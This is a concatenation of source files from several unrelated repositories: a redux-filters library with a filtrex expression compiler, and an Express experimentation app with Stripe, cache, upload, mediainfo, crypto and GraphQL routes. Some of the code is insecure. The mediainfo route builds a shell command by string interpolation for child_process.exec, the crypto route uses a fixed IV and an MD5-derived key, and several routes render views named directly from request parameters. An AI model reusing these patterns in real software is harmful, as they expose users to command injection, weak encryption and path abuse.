export const FILTERS_BRANCH = 'FILTERS';
export const FILTERS_SET_BRANCH = 'FILTERS_SET';
export const DATA_BRANCH = 'DATA';
// Fitler state
export const FILTER_INITIAL = 'inital';
export const FILTER_ACTIVE = 'active';
export const FILTER_DISABLED = 'disabled';
// When all filtered items applied to this filter, so you may disable the filter
export const FILTER_MAYBE_DISABLED = 'maybe_disabled';
export const FILTER_HIDDEN = 'hidden';
<file_sep>/README.md
# redux-filters
[![NPM version][npm-image]][npm-url]
[![Build Status][travis-image]][travis-url]
[![Dependency Status][daviddm-image]][daviddm-url]
[![Codecov][codecov-image]][codecov-url]
> fast redux filters using bit operations and reselect memoization
## Installation
```sh
$ npm install --save redux-filters
```
## Usage
### Bitmask Filters
Until now this is the only type of filters you can add, more are coming.
You can use this type of filter if you have a `predicate` you want to check on every filterable item. Like if you have an array of objects (phones) like the following:
```js
export const phones = [
{
phoneId: 'A1905',
features: ['Apple Pay', 'Dual cameras'],
isWaterProof: true
},
{
phoneId: 'D855',
features: ['touch focus', 'HDR'],
isWaterProof: false
},
{
phoneId: 'pixel2',
features: ['touch focus', 'panorama', 'Auto HDR'],
isWaterProof: true
}
];
```
So if want to add a water proof filter, the predicate would be `isWaterProof`.
For an `HDR` filter, the predicate would be `contains(features, "HDR")`.
> Check [filtreX](https://github.com/joewalnes/filtrex) to learn more what predicate you could write.
> We copied filtreX code and generated the parser, so the building time is better.
#### How to add bitmask filters
After you add filterReducer to your state reducers, you should add the category for your filters first.
```js
import { addBitmaskFilter } from 'redux-filters';
addBitmaskFilterCategory({ category: 'features', disjunctive: false });
```
Here we added a new category called features which are conjunctive, which means for an item to be returned it should passed all the filters in this category.
Next we want to add water proof filter:
```js
import { addBitmaskFilter } from 'redux-filters';
addBitmaskFilter({
category: 'features',
id: 'waterProof',
predicate: `isWaterProof`
});
```
#### Change filters state
When a filter is added, it's deactivated by default.
```js
import {
activateFilter,
deactivateFilter,
toggleFilter,
resetFilters,
clearFilters
} from 'redux-filters';
// Activate water proof filter
activateFilter({ category: 'features', filterId: 'waterProof' });
// Deactivate water proof filter
deactivateFilter({ category: 'features', filterId: 'waterProof' });
// As the name suggest toggle filter state
toggleFilter({ category: 'features', filterId: 'waterProof' });
// Reset all filters to deactivated
resetFilters();
// Probably you don't need this, but you could use it to delete all filters
clearFilters();
```
## License
MIT © [Abdallatif]()
[npm-image]: https://badge.fury.io/js/redux-filters.svg
[npm-url]: https://npmjs.org/package/redux-filters
[travis-image]: https://travis-ci.org/Abdallatif/redux-filters.svg?branch=master
[travis-url]: https://travis-ci.org/Abdallatif/redux-filters
[codecov-image]: https://codecov.io/gh/Abdallatif/redux-filters/branch/master/graph/badge.svg
[codecov-url]: https://codecov.io/gh/Abdallatif/redux-filters
[daviddm-image]: https://david-dm.org/Abdallatif/redux-filters.svg?theme=shields.io
[daviddm-url]: https://david-dm.org/Abdallatif/redux-filters
<file_sep>/src/filterx/compiler.js
/* eslint-disable */
import Parser from './parser';
export default function compileExpression(expression, extraFunctions /* optional */) {
const functions = {
abs: Math.abs,
ceil: Math.ceil,
floor: Math.floor,
log: Math.log,
max: Math.max,
min: Math.min,
random: Math.random,
round: Math.round,
sqrt: Math.sqrt,
};
if (extraFunctions) {
for (const name in extraFunctions) {
if (extraFunctions.hasOwnProperty(name)) {
functions[name] = extraFunctions[name];
}
}
}
if (!compileExpression.parser) {
// Building the original parser is the heaviest part. Do it
// once and cache the result in our own function.
compileExpression.parser = Parser;
}
const tree = compileExpression.parser.parse(expression);
// console.log(expression, tree);
const js = [];
js.push('return ');
function toJs(node) {
if (Array.isArray(node)) {
node.forEach(toJs);
} else {
js.push(node);
}
}
tree.forEach(toJs);
js.push(';');
function unknown(funcName) {
throw `Unknown function: ${funcName}()`;
}
const func = new Function('functions', 'data', 'unknown', js.join(''));
return function (data) {
return func(functions, data, unknown);
};
}
<file_sep>/src/actions.js
import { createAction } from 'redux-act';
export const updateIdProp = createAction('Filterable data update id prop');
export const addBitmaskFilterCategory = createAction('Add new bitmask filter category');
export const addBitmaskFilter = createAction('Add new bitmask filter');
export const activateFilter = createAction('Activate filter');
export const deactivateFilter = createAction('Deactivate filter');
export const toggleFilter = createAction('Toggle filter');
export const resetFilters = createAction('Reset filter');
export const clearFilters = createAction('Clear filter');
export const checkAndUpdateData = createAction('Check and update new filterable data');
export const updateData = createAction('Force update new filterable data'); // Maybe if you add filter at later stage
export const clearData = createAction('Clear Data');
| 446bd8e5b555e1d42bdc0fed42a7781e5babf533 | [
"JavaScript",
"Markdown"
] | 6 | JavaScript | Abdallatif/redux-filters | 328ddf534ce4bfee38268b43c6bde653704e61d1 | 702e13f0994724ce549566dd9763cdec6f309517 |
refs/heads/master | <file_sep>const express = require('express');
const router = express.Router();
const Jimp = require('jimp');
const os = require('os');
const multer = require('multer');
const upload_local = multer({ dest: os.tmpdir() });
router.post('/resize', upload_local.fields([ { name: 'file' } ]), function(req, res) {
console.log('files', req.files);
//console.log('files.file[0]', req.files.file[0]);
//console.log('body', req.body);
const payload = {
title : 'Resize | Jimp',
data: {}
};
Jimp.read(req.files.file[0].path).then(image => {
return image.resize(64, 64).getBase64Async(Jimp.MIME_PNG); // resize
}).then(function(base64) {
payload.data.image_src = base64;
res.render('jimp/resize', payload);
}).catch(function(err) {
console.error(err);
payload.data.err = err;
res.render('jimp/resize', payload);
});
// res.render('jimp/resize', payload);
});
router.get('/:view', function(req, res, next) {
res.render('jimp/' + req.params.view, { title: req.params.view + ' | Jimp', data: {} });
});
module.exports = router;
<file_sep>const express = require('express');
const router = express.Router();
const os = require('os');
const multer = require('multer');
const upload_local = multer({ dest: os.tmpdir() });
const child_process = require('child_process');
const parse = require('mediainfo-parser').parse;
router.post('/file_upload', upload_local.fields([ { name: 'file' } ]), function(req, res) {
const payload = {
title : 'File Uploaded | mediainfo',
data: {
files: req.files
}
};
//const mediapath = '~/Downloads/big_buck_bunny_1080p_h264.mov';
const mediapath = req.files.file[0].path;
child_process.exec(`mediainfo --Full --Output=XML "${mediapath}"`, (stderr, stdout) => {
payload.data.stderr = stderr;
payload.data.stdout = stdout;
parse(stdout, (err, obj) => {
payload.data.err = err;
payload.data.obj = obj;
res.render('mediainfo/file_upload', payload);
});
});
});
router.get('/:view', function(req, res, next) {
res.render('mediainfo/' + req.params.view, { title: req.params.view + ' | mediainfo', data: {} });
});
module.exports = router;
<file_sep>
LOADING_SECOND = '2nd';
function loading_func_2nd(caller) {
console.log('loading_func_2nd', caller);
}
console.log('loading/second.js', LOADING_FIRST);
loading_func_1st('loading/second.js');
console.log('loading/second.js', 'END');
<file_sep>
/*
* Preloader (pure js) - 1.0
* It's automatic loading images from HTML structure and included CSS files, using Promise object (if supported).
*/
(function (root, factory) {
if (typeof define === 'function' && define.amd) { // AMD
define(factory);
} else if (typeof exports === 'object') { // Node.js, CommonJS
module.exports = factory();
} else {
root.preloader = factory; // Window
}
}(this, function() {
'use strict';
var $ = {};
$.defaults = {
debug: false,
// mode: 1, // 1: html, css | 2: html
filesToLoad: [],
allowed: ['jpg', 'jpeg', 'png', 'gif'],
loadDelay: 0, // ms
beforeLoad: function() {},
afterLoad: function() {},
onUpdate: function(percent) {}
};
$.regex = {
src: /src=\"(.*?)\"/gm,
url: /url\((.*?)\)/gm,
css: /<link href=\"(.*?)\"/gm
};
$.html = String(document.querySelector("html").innerHTML);
var loadFunctions = [];
var init = function(customOptions) {
try {
checkPromiseSupport();
if(typeof customOptions == 'object') {
$.options = mergeOptions(customOptions);
} else {
$.options = $.defaults;
}
if($.options.filesToLoad.length) {
// remove duplicates
$.filelist = $.options.filesToLoad.filter(function(x, y) {
return $.options.filesToLoad.indexOf(x) == y;
});
beforeLoad();
} else {
getFromHTML(getFromCSS);
}
} catch(err) {
console.log(err);
}
};
var mergeOptions = function(customOptions) {
for(var key in customOptions) {
if(typeof $.defaults[key] !== 'undefined') {
$.defaults[key] = customOptions[key];
} else {
if($.defaults.debug) throw "There's no option called: '" + key + "'";
}
}
return $.defaults;
};
var checkPromiseSupport = function() {
if(typeof Promise !== "undefined" && Promise.toString().indexOf("[native code]") !== -1) {
$.promise = true;
} else {
$.promise = false;
}
};
var checkIfAllowed = function(file) {
var getType = /([^.;+_]+)$/.exec(file),
fileType = getType && getType[1];
// checking if file format is defined in config as allowed
if($.options.allowed.indexOf(fileType) > -1) {
return true;
} else {
return false;
}
};
var getFromHTML = function(callback) {
var match, matches = [];
while(match = $.regex.src.exec($.html)) {
// checks if format is defined in config as allowed to load
if(checkIfAllowed(match[1])) {
matches.push(match[1]);
}
}
while(match = $.regex.url.exec($.html)) {
match = match[1].replace(/[']/g, ""); // delete ' if string contains
// checks if fileformat is defined in config as allowed to load
if(checkIfAllowed(match)) {
matches.push(match);
}
}
if(typeof callback == 'function') {
callback();
}
};
var getFromCSS = function() {
var match, matches = [];
while(match = $.regex.css.exec($.html)) {
// making request to download css file
var request = new XMLHttpRequest();
request.open("GET", match[1], true);
request.send();
request.onreadystatechange = function() {
if (request.readyState == 4 && request.status == 200) {
// gets images from url('*')
while(match = $.regex.url.exec(request.responseText)) {
// delete ' if string contains
match = match[1].replace(/[']/g, "");
// checks if fileformat is defined in config as allowed to load
if(checkIfAllowed(match)) {
matches.push(match);
}
}
// remove duplicates
$.filelist = matches.filter(function(x, y) {
return matches.indexOf(x) == y;
});
beforeLoad();
}
};
}
};
var beforeLoad = function() {
if(typeof $.options.beforeLoad == 'function') {
$.options.beforeLoad();
}
load();
}
var load = function() {
var promise, loaded = 0, percent = 0;
/*
* checks if promise is supported
*/
if($.promise) {
/*
* main loading function
* Map filelist and call function loadImage on each image that's returnig a Promise
* Returns variable with all Promises
*/
// map filelist
var files = $.filelist.map(function (src) {
// call function loadImage on each image
return loadImage(src).then(function() {
// update percentage on resolve
loaded++;
updatePercentage(loaded);
}, function(error) {
// update percentage on reject
loaded++;
updatePercentage(loaded);
});
});
/*
* When all Promises are resolved call afterLoad function
*/
Promise.all(files).then(function () {
$.complete = true;
afterLoad();
});
} else {
/*
* if promise is not supported
*/
$.loadedImages = 0;
checkIfAllLoaded();
for (var i = $.filelist.length - 1; i >= 0; i--) {
loadImage($.filelist[i]);
}
}
};
var loadImage = function(src) {
/*
* checks if promise is supported
*/
if($.promise) {
return new Promise(function(resolve, reject) {
// create image object
var image = new Image();
image.src = src;
// handle events
image.onload = function() {
resolve();
};
image.onerror = function() {
reject("Can't find: " + src);
};
});
} else {
/*
* if Promise is not supported
*/
// create image object
var image = new Image();
image.src = src;
// handle events
image.onload = function() {
$.loadedImages++;
updatePercentage($.loadedImages);
};
image.onerror = function() {
$.loadedImages++;
updatePercentage($.loadedImages);
};
}
};
var updatePercentage = function(loaded) {
var percent = Number(parseFloat((loaded / $.filelist.length) * 100).toFixed(2));
$.options.onUpdate(percent);
};
// function that checks if all files are loaded
var checkIfAllLoaded = function() {
var checkIfLoaded = setInterval(function() {
if($.loadedImages === $.filelist.length) {
$.complete = true;
afterLoad();
clearInterval(checkIfLoaded);
}
}, 50);
};
/*
* afterLoad function
* Function that is started when preloader is done loading
* It's removing onload attr from images in DOM and it's starting function defined in config and functions added by onLoad function (with delay if defined in config)
*/
var afterLoad = function() {
// remove onload function from images in DOM added by init function at beginning
// var images = document.images;
// for (var i = images.length - 1; i >= 0; i--) {
// images[i].removeAttribute("onload");
// }
setTimeout(function() {
// call standard function defined in config
$.options.afterLoad();
// call functions added by onLoad function
for (var i = loadFunctions.length - 1; i >= 0; i--) {
loadFunctions[i]();
}
}, $.options.loadDelay);
};
var onLoad = function(fn) {
// check if preloader is done loading, if so call function
if($.complete) {
fn();
} else {
// if preloader is still loading images, add function to array of functions that will be fired when preloader is done loading
if(typeof fn == 'function') {
loadFunctions.push(fn);
}
}
};
return {
preloader: $,
init: init,
onLoad: onLoad
};
}()));
<file_sep>const debug = require('debug')('node-js-web-sandbox:routes:crypto');
const express = require('express');
const router = express.Router();
const crypto = require('crypto');
// Refer: https://qiita.com/kou_pg_0131/items/174aefd8f894fea4d11a
const create32byte = (input) => {
return crypto.createHash('md5').update(input).digest('hex');
};
router.post('/encrypt', (req, res) => {
//debug('encrypt:req.body', req.body);
// Refer: https://qiita.com/Ishidall/items/bb0e0db86a2f56fb1022
const ENCRYPTION_KEY = create32byte(req.body.email); // 32Byte.
const BUFFER_KEY = '<KEY>'; // 16Byte.
const ENCRYPT_METHOD = 'aes-256-cbc';
const ENCODING = 'hex';
const getEncryptedString = (raw) => {
const iv = Buffer.from(BUFFER_KEY);
const cipher = crypto.createCipheriv(ENCRYPT_METHOD, Buffer.from(ENCRYPTION_KEY), iv);
let encrypted = cipher.update(raw);
encrypted = Buffer.concat([encrypted, cipher.final()]);
return encrypted.toString(ENCODING);
};
const local = {
title: 'Encrypt POST | Crypto',
data: {
result: getEncryptedString(req.body.text)
}
};
res.render('crypto/encrypt', local);
});
router.post('/decrypt', (req, res) => {
debug('decrypt:req.body', req.body);
// Refer: https://qiita.com/Ishidall/items/bb0e0db86a2f56fb1022
const ENCRYPTION_KEY = create32byte(req.body.email); // 32Byte.
const BUFFER_KEY = '<KEY>'; // 16Byte.
const ENCRYPT_METHOD = 'aes-256-cbc';
const ENCODING = 'hex';
const getDecryptedString = (encrypted) => {
let iv = Buffer.from(BUFFER_KEY);
let encryptedText = Buffer.from(encrypted, ENCODING);
let decipher = crypto.createDecipheriv(ENCRYPT_METHOD, Buffer.from(ENCRYPTION_KEY), iv);
let decrypted = decipher.update(encryptedText);
decrypted = Buffer.concat([decrypted, decipher.final()]);
return decrypted.toString()
};
const local = {
title: 'Decrypt POST | Crypto',
data: {
result: getDecryptedString(req.body.text)
}
};
res.render('crypto/decrypt', local);
});
router.get('/:view', function(req, res, next) {
const local = {
title: req.params.view + ' | Crypto',
data: {}
};
res.render('crypto/' + req.params.view, local);
});
module.exports = router;
<file_sep>
LOADING_FIRST = '1st';
function loading_func_1st(caller) {
console.log('loading_func_1st', caller);
}
console.log('loading/first.js', 'END');
<file_sep># node-js-web-sandbox
Try Web etc.
## Setup on your local
```
$ git clone <EMAIL>:tayutaedomo/node-js-web-sandbox.git
$ cd node-js-web-sandbox
$ npm install
$ npm start
$ open 'http://localhost:3000'
```
## Setup for Redis
Set redis config if use Redis.
```
$ export REDIS_URL=redis://user:password@redis-service.com:6379/
```
## Setup for memcached
Set memcached config if use memcached.
```
$ export MEMCACHE_SERVERS=[user:pass@]server1[:11211],[user:pass@]server2[:11211]
```
<file_sep>var debug = require('debug')('node-js-web-sandbox:routes:stripe');
var express = require('express');
var router = express.Router();
var stripe = require('stripe')(process.env.STRIPE_SECRET_KEY);
router.get('/checkout', function(req, res) {
res.render('stripe/checkout', {
title : 'Stripe Checkout',
data: { params: {} }
});
});
router.post('/checkout', function(req, res) {
var payload = {
title : 'Stripe Checkout',
data: {
params: {},
result_list: []
}
};
payload.data.params.email = req.body.email;
payload.data.params.token = req.body.stripeToken;
debug(payload.data.params);
// See: https://stripe.com/docs/quickstart#saving-card-information
stripe.customers.create({
email: payload.data.params.email,
source: payload.data.params.token
}).then(function(customer) {
// YOUR CODE: Save the customer ID and other info in a database for later.
debug(customer);
payload.data.result_list.push(customer);
return stripe.charges.create({
amount: 1000,
currency: "usd",
customer: customer.id
});
}).then(function(charge) {
// Use and save the charge info.
debug(charge);
payload.data.result_list.push(charge);
payload.data.result = JSON.stringify(payload.data.result_list, null, 2);
res.render('stripe/checkout', payload);
}).catch(function(err) {
console.error(err.stack);
payload.data.error = err;
res.render('stripe/checkout', payload);
});
});
router.get('/checkout_price', function(req, res) {
res.render('stripe/checkout_price', {
title : 'Stripe Checkout without Price',
data: { params: {} }
});
});
router.post('/checkout_price', function(req, res) {
var payload = {
title : 'Stripe Checkout without Price',
data: {
params: {},
result_list: []
}
};
payload.data.params.email = req.body.email;
payload.data.params.token = req.body.stripeToken;
debug(payload.data.params);
stripe.customers.create({
email: payload.data.params.email,
source: payload.data.params.token
}).then(function(customer) {
// YOUR CODE: Save the customer ID and other info in a database for later.
debug(customer);
payload.data.result_list.push(customer);
if (req.body.no_charge == 1) return {};
return stripe.charges.create({
amount: 2000,
currency: "usd",
customer: customer.id
});
}).then(function(charge) {
// Use and save the charge info.
debug(charge);
payload.data.result_list.push(charge);
payload.data.result = JSON.stringify(payload.data.result_list, null, 2);
res.render('stripe/checkout_price', payload);
}).catch(function(err) {
console.error(err.stack);
payload.data.error = err;
res.render('stripe/checkout_price', payload);
});
});
router.get('/charge', function(req, res) {
res.render('stripe/charge', {
title : 'Stripe Charge',
data: { params: {} }
});
});
router.post('/charge', function(req, res) {
var payload = {
title : 'Stripe Charge',
data: { params: {} }
};
stripe.charges.create({
amount: 1000,
currency: "usd",
// amount: 1000,
// currency: "jpy",
customer: req.body.customer_id
}).then(function(charge) {
debug(charge);
payload.data.result = JSON.stringify(charge, null, 2);
res.render('stripe/charge', payload);
}).catch(function(err) {
console.error(err.stack);
payload.data.error = err;
res.render('stripe/charge', payload);
});
});
router.get('/subscription', function(req, res) {
res.render('stripe/subscription', {
title : 'Stripe Subscription',
data: { params: {} }
});
});
router.post('/subscription', function(req, res) {
var payload = {
title : 'Stripe Subscription',
data: { params: {} }
};
stripe.subscriptions.create({
customer: req.body.customer_id,
items: [
{
plan: 'usd_monthly'
}
]
}).then(function(subscription) {
debug(subscription);
payload.data.result = JSON.stringify(subscription, null, 2);
res.render('stripe/charge', payload);
}).catch(function(err) {
console.error(err.stack);
payload.data.error = err;
res.render('stripe/subscription', payload);
});
});
router.get('/elements', function(req, res) {
res.render('stripe/elements', {
title : 'Stripe Elements',
data: { params: {} }
});
});
router.post('/elements', function(req, res) {
var payload = {
title : 'Stripe Elements',
data: {
params: {},
result_list: []
}
};
payload.data.params = req.body;
payload.data.result = JSON.stringify(req.body, null, 2);
res.render('stripe/elements', payload);
});
router.get('/v3_checkout_client', function(req, res) {
res.render('stripe/v3_checkout_client', {
title : 'Stripe v3 Checkout Client',
data: { req: req, res: res }
});
});
router.get('/v3_checkout_client/success', function(req, res) {
res.render('stripe/v3_checkout_client', {
title : 'Stripe v3 Checkout Client Success',
data: { req: req, res: res }
});
});
router.get('/v3_checkout_client/cancel', function(req, res) {
res.render('stripe/v3_checkout_client', {
title : 'Stripe v3 Checkout Client Cancel',
data: { req: req, res: res }
});
});
router.get('/v3_checkout_server', (req, res) => {
let base_url = `${req.protocol}://`;
base_url += req.hostname == 'localhost' ? 'localhost:3002' : req.hostname;
const success_url = `${base_url}/stripe/v3_checkout_server/success`;
const cancel_url = `${base_url}/stripe/v3_checkout_server/cancel`;
const payload = {
title : 'Stripe v3 Checkout Server',
data: { req: req, res: res }
};
stripe.checkout.sessions.create({
payment_method_types: ['card'],
line_items: [{
name: 'T-shirt',
description: 'Comfortable cotton t-shirt',
images: ['https://tayutaedomo-web.herokuapp.com/images/shutterstock_125750330.jpg'],
amount: 1000,
currency: 'usd',
quantity: 1,
}],
success_url: success_url,
cancel_url: cancel_url,
}, (err, session) => {
if (err) {
console.error(err.stack || err);
payload.data.error = err;
} else {
payload.data.session = session;
}
debug('v3_checkout_server payload', payload);
res.render('stripe/v3_checkout_server', payload);
});
});
router.get('/v3_checkout_server/success', (req, res) => {
res.render('stripe/v3_checkout_server', {
title : 'Stripe v3 Checkout Server Success',
data: { req: req, res: res }
});
});
router.get('/v3_checkout_server/cancel', (req, res) => {
res.render('stripe/v3_checkout_server', {
title : 'Stripe v3 Checkout Server Cancel',
data: { req: req, res: res }
});
});
module.exports = router;
<file_sep>/*
* Reference: https://circleci.com/ja/blog/custom-docker-02/
*/
const express = require('express');
const router = express.Router();
const graphqlHTTP = require('express-graphql');
const schema = require('./schema');
const resolvers = require('./resolvers');
router.use(
'/',
graphqlHTTP({
schema,
rootValue: resolvers,
graphiql: true
})
);
module.exports = router;
<file_sep>const express = require('express');
const router = express.Router();
const os = require('os');
const multer = require('multer');
const upload_local = multer({ dest: os.tmpdir() });
const upload_memoney = multer({}); // No file output, file.buffer only
const util = require('util')
const multiparty = require('multiparty');
router.post('/multer_local', upload_local.fields([ { name: 'file' } ]), function(req, res) {
console.log('files', req.files);
console.log('files.file[0]', req.files.file[0]);
console.log('body', req.body);
const payload = {
title : 'Local Store | Multer',
data: {}
};
res.render('file_upload/multer_local', payload);
});
router.post('/multer_memory', upload_memoney.fields([ { name: 'file' } ]), function(req, res) {
console.log('files', req.files);
console.log('body', req.body);
const payload = {
title : 'On Memory | Multer',
data: {}
};
res.render('file_upload/multer_memory', payload);
});
router.post('/multer_xhr', upload_local.fields([ { name: 'file' } ]), function(req, res) {
console.log('files', req.files);
console.log('body', req.body);
const payload = {
files: req.files,
body: req.body
};
res.send(util.inspect(payload, { depth: 10 }));
});
router.post('/multiparty', function(req, res) {
const payload = {
title : 'multiparty',
data: {}
};
const form = new multiparty.Form();
form.parse(req, function(err, fields, files) {
if (err) console.error(err.stack || err);
console.log('body', req.body);
console.log('fields', fields);
console.log('files', util.inspect(files, { colors: true, depth: 10 }));
res.render('file_upload/multiparty', payload);
});
});
router.get('/:view', function(req, res, next) {
res.render('file_upload/' + req.params.view, { title: req.params.view + ' | File Upload', data: {} });
});
module.exports = router;
<file_sep>var express = require('express');
var router = express.Router();
//var beautify = require('js-beautify').js_beautify;
var redis_url = process.env.REDIS_URL;
// router.get('/:view', function(req, res, next) {
// res.render('cache/' + req.params.view, { title: req.params.view + ' | Cache Middleware' });
// });
router.get('/redis/get', function(req, res) {
res.render('cache/redis/get', {
title : 'Redis Get',
data: { params: {} }
});
});
router.post('/redis/get', function(req, res) {
var key = req.body.key;
var params = { key: key };
var redis = require('redis');
var client = redis.createClient(redis_url);
// TODO: How to integrate connect error handling
client.on('error', function (err) {
console.error(err);
});
var payload = {
title : 'Redis Get',
data: {
params: params
}
};
client.get(key, function(err, value) {
if (err) {
//beautify(JSON.stringify(err), { indent_size: 2 })
payload.data.error = JSON.stringify(err, null, 2);
} else {
if (value == null) {
payload.data.result = 'Value is null.';
} else {
payload.data.result = value;
}
}
res.render('cache/redis/get', payload);
});
});
router.get('/ioredis/get', function(req, res) {
res.render('cache/ioredis/get', {
title : 'ioredis Get',
data: { params: {} }
});
});
router.post('/ioredis/get', function(req, res) {
var key = req.body.key;
var params = { key: key };
var Redis = require('ioredis');
var redis = new Redis(redis_url);
var payload = {
title : 'Redis Get',
data: {
params: params
}
};
redis.get(key, function (err, result) {
if (err) {
payload.data.error = JSON.stringify(err, null, 2);
} else {
if (result == null) {
payload.data.result = 'Value is null.';
} else {
payload.data.result = result;
}
}
res.render('cache/ioredis/get', payload);
});
});
router.get('/ioredis/set', function(req, res) {
res.render('cache/ioredis/set', {
title : 'ioredis Set',
data: { params: {} }
});
});
router.post('/ioredis/set', function(req, res) {
var key = req.body.key;
var value = req.body.value;
var params = { key: key };
var Redis = require('ioredis');
var redis = new Redis(redis_url);
var payload = {
title : 'Redis Set',
data: {
params: params
}
};
redis.set(key, value, function(err, result) {
if (err) {
payload.data.error = JSON.stringify(err, null, 2);
} else {
payload.data.result = result;
}
res.render('cache/ioredis/get', payload);
});
});
router.get('/node-memcached-client/get', function(req, res) {
res.render('cache/node-memcached-client/get', {
title : 'node-memcached-client Get',
data: { params: {} }
});
});
router.post('/node-memcached-client/get', function(req, res) {
var key = req.body.key;
var params = { key: key };
var Memcached = require('node-memcached-client');
var client = new Memcached({
host: 'localhost',
port: 11211
});
var payload = {
title : 'node-memcached-client Get',
data: {
params: params
}
};
client.connect().then(function(c) {
return c.get(key);
}).then(function(value) {
if (value == null) {
payload.data.result = 'Value is null.';
} else {
payload.data.result = value;
}
res.render('cache/node-memcached-client/get', payload);
}).catch(function(err) {
payload.data.error = JSON.stringify(err, null, 2);
res.render('cache/node-memcached-client/get', payload);
});
});
router.get('/memjs/get', function(req, res) {
res.render('cache/memjs/get', {
title : 'memjs Get',
data: { params: {} }
});
});
router.post('/memjs/get', function(req, res) {
var key = req.body.key;
var params = { key: key };
var memjs = require('memjs');
var client = memjs.Client.create();
var payload = {
title : 'memjs Get',
data: {
params: params
}
};
client.get(key, function(err, value) {
if (err) {
payload.data.error = JSON.stringify(err, null, 2);
} else {
if (value == null) {
payload.data.result = 'Value is null.';
} else {
payload.data.result = value;
}
}
res.render('cache/memjs/get', payload);
});
});
router.get('/memjs/set', function(req, res) {
res.render('cache/memjs/set', {
title : 'memjs Set',
data: { params: {} }
});
});
router.post('/memjs/set', function(req, res) {
var key = req.body.key;
var value = req.body.value;
var params = { key: key };
var memjs = require('memjs');
var client = memjs.Client.create();
var payload = {
title : 'memjs Set',
data: {
params: params
}
};
client.set(key, value, { expires: 600 }, function(err, result) {
if (err) {
payload.data.error = JSON.stringify(err, null, 2);
} else {
payload.data.result = result;
}
res.render('cache/memjs/set', payload);
});
});
module.exports = router;
<file_sep>var express = require('express');
var router = express.Router();
/* GET home page. */
router.get('/', function(req, res, next) {
console.log('req.headers["x-forwarded-for"]', req.headers['x-forwarded-for']);
console.log('req.connection.remoteAddress', req.connection.remoteAddress);
console.log('req.headers["x-appengine-user-ip"]', req.headers['x-appengine-user-ip']);
console.log('req.ip', req.ip);
console.log('req.ips', req.ips);
res.render('index', { title: 'Web Sandbox' });
});
var VIDEOJS_TITLES = {
quick_start: 'Quick Start',
quick_start_without_auto: 'Quick Start without auto setup',
guide_setup: 'Guide: Setup',
guide_setup_centered: 'Guide: Setup with play button centered',
guide_setup_dynamically: 'Guide: Setup with dynamically loaded',
contrib_hls: 'videojs-contrib-hls',
design_resizing: 'Design: Resizing',
events: 'Events'
};
router.get('/videojs/:view', function(req, res) {
var title = VIDEOJS_TITLES[req.params.view] ? VIDEOJS_TITLES[req.params.view] : req.params.view;
res.render('videojs/' + req.params.view, { title : title });
});
router.get('/agilecrm/api', function(req, res, next) {
res.render('agilecrm/api', { title: 'Agile CRM API' });
});
router.get('/dom/:view', function(req, res, next) {
res.render('dom/' + req.params.view, { title: req.params.view + ' | DOM' });
});
router.get('/css/:view', function(req, res, next) {
res.render('css/' + req.params.view, { title: req.params.view + ' | CSS' });
});
router.get('/js/:view', function(req, res, next) {
res.render('js/' + req.params.view, { title: req.params.view + ' | Javascript' });
});
router.get('/webrtc/:view', function(req, res, next) {
res.render('webrtc/' + req.params.view, { title: req.params.view + ' | Media API' });
});
router.get('/canvas/:view', function(req, res, next) {
res.render('canvas/' + req.params.view, { title: req.params.view + ' | Canvas' });
});
router.get('/timeline/:view', function(req, res, next) {
res.render('timeline/' + req.params.view, { title: req.params.view + ' | Timeline' });
});
router.get('/ios/:view', function(req, res, next) {
res.render('ios/' + req.params.view, { title: req.params.view + ' | iOS Web' });
});
router.get('/hlsjs/:view', function(req, res, next) {
res.render('hlsjs/' + req.params.view, { title: req.params.view + ' | hls.js' });
});
router.get('/qrcode/:view', function(req, res, next) {
res.render('qrcode/' + req.params.view, { title: req.params.view + ' | QR Code' });
});
router.get('/scheme/:view', function(req, res, next) {
res.render('scheme/' + req.params.view, { title: req.params.view + ' | URL Scheme' });
});
router.get('/html_video/:view', function(req, res, next) {
res.render('html_video/' + req.params.view, { title: req.params.view + ' | HTMLVideoElement' });
});
router.get('/manifest.json', function(req, res) {
res.send(
{
"short_name": "TayuWebSdx",
"name": "Tayutaedomo Web Sandbox",
"icons": [
{
"src": "/images/icon/app_48x48.png",
"type": "image/png",
"sizes": "48x48"
}
// {
// "src": "launcher-icon-2x.png",
// "type": "image/png",
// "sizes": "96x96"
// },
// {
// "src": "launcher-icon-4x.png",
// "type": "image/png",
// "sizes": "192x192"
// }
],
"start_url": "/?manifest=1",
"display": "browser"
//"display": "standalone"
//"orientation": "landscape"
});
});
module.exports = router;
<file_sep>//require('sqreen');
const express = require('express');
const engine = require('ejs-mate');
const path = require('path');
const favicon = require('serve-favicon');
const logger = require('morgan');
const cookieParser = require('cookie-parser');
const bodyParser = require('body-parser');
const beautify = require('js-beautify').js_beautify;
const routes = require('./routes/index');
const cache_routes = require('./routes/cache');
const stripe_routes = require('./routes/stripe');
const file_upload_routes = require('./routes/file_upload');
const mediainfo_routes = require('./routes/mediainfo');
const pdf_routes = require('./routes/pdf');
const jimp_routes = require('./routes/jimp');
const crypto_routes = require('./routes/crypto');
const graphql_routes = require('./routes/graphql');
const app = express();
// view engine setup
app.engine('ejs', engine);
app.set('views', path.join(__dirname, 'views'));
app.set('view engine', 'ejs');
// uncomment after placing your favicon in /public
app.use(favicon(path.join(__dirname, 'public', 'favicon.ico')));
app.use(logger('dev'));
app.use(bodyParser.json());
app.use(bodyParser.urlencoded({ extended: false }));
app.use(cookieParser());
app.use(express.static(path.join(__dirname, 'public')));
// locals
app.locals.beautify = beautify;
app.use('/cache', cache_routes);
app.use('/stripe', stripe_routes);
app.use('/file_upload', file_upload_routes);
app.use('/mediainfo', mediainfo_routes);
app.use('/pdf', pdf_routes);
app.use('/jimp', jimp_routes);
app.use('/crypto', crypto_routes);
app.use('/graphql', graphql_routes);
app.use('/', routes);
// catch 404 and forward to error handler
app.use(function(req, res, next) {
const err = new Error('Not Found');
err.status = 404;
next(err);
});
// error handlers
// development error handler
// will print stacktrace
if (app.get('env') === 'development') {
app.use(function(err, req, res, next) {
res.status(err.status || 500);
res.render('error', {
message: err.message,
error: err
});
});
}
// production error handler
// no stacktraces leaked to user
app.use(function(err, req, res, next) {
res.status(err.status || 500);
res.render('error', {
message: err.message,
error: {}
});
});
module.exports = app;
| a7e503ad0dc4b8481640aeba0b297fbe5bd0a969 | [
"JavaScript",
"Markdown"
] | 13 | JavaScript | tayutaedomo/videojs-trial | 1f20043165ca47c8fd733bba087c19a3297710fb | a1d480db5557949cf1e36c77c40dcd2b6075fecd |
refs/heads/master | <repo_name>HayWiir/Hangman<file_sep>/README.md
# Hangman
A variant of the hangman word game.
